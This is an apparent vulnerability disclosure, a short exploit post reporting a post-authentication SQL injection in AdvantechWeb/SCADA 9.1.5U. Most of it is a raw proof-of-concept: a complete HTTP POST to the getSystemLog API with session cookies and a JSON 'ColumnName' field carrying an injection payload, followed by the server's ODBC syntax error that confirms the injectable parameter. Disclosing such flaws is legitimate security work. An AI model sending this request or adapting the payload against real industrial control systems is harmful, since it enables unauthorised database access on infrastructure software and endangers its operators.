Authored by Cody Sixteen | Site code610.blogspot.com

AdvantechWeb/SCADA version 9.1.5U suffers from a post authentication remote SQL injection vulnerability.

;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U
;; 
;; found: 28.12.2023
;;
;; more: 
;;   https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html
;; 


POST /waconfig/api/odbc/getSystemLog HTTP/2
Host: 192.168.56.106
Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPAN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 359
Origin: https://192.168.56.106
Referer: https://192.168.56.106/waconfig/index
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}



resp:

HTTP/2 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 225
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
X-Ua-Compatible: IE=EmulateIE7
Access-Control-Allow-Origin: http://localhost:8080
Access-Control-Allow-Methods: GET,POST,OPTIONS
Access-Control-Allow-Headers: Content-Type
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=31536000;includeSubDomains;preload
X-Content-Type-Options: nosniff
Date: Thu, 28 Dec 2023 21:29:56 GMT

{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression u0027%27u003e%22u003eu003csvg/onload=prompt(123)u003eu0027."}

 
;; cheers
;;

RELATED ARTICLESMORE FROM AUTHOR